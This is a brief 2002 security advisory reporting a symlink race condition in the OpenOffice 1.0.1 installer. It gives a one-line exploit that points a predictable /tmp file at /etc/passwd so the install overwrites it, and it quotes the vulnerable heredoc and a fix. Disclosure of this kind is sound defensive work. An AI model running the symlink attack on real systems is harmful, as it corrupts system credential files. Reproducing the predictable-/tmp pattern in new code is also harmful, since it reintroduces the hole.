======OpenOffice 1.0.1 Race Condition During Installation======
//9/9/02//


**Summary:** OpenOffice 1.0.1 Race condition during installation can overwrite
system files.

**Severity:** Low

**Description:** A very simple and easy to exploit race condition exist during the
installation of OpenOffice.  During this window a malicous user could create a
symlink in /tmp and overwrite arbitrary files.

**Exploit:**

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

will result in the password file being over written with:

# create the proper autoresponse file
<file>
  cat << EOF > /tmp/${USER}_autoresponse.conf
  [ENVIRONMENT]
  INSTALLATIONMODE=$installtype
  INSTALLATIONTYPE=STANDARD
  DESTINATIONPATH=$prefix/$oo_home
  OUTERPATH=
  LOGFILE=
  LANGUAGELIST=<LANGUAGE>
  
  [JAVA]
  JavaSupport=preinstalled_or_none
  
  EOF
</file>
**Fix:**
Create a directory under /tmp to work from.  With restrictive permissions.

**References:**

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

I happend to find this bug with my crude kernel patch at
http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx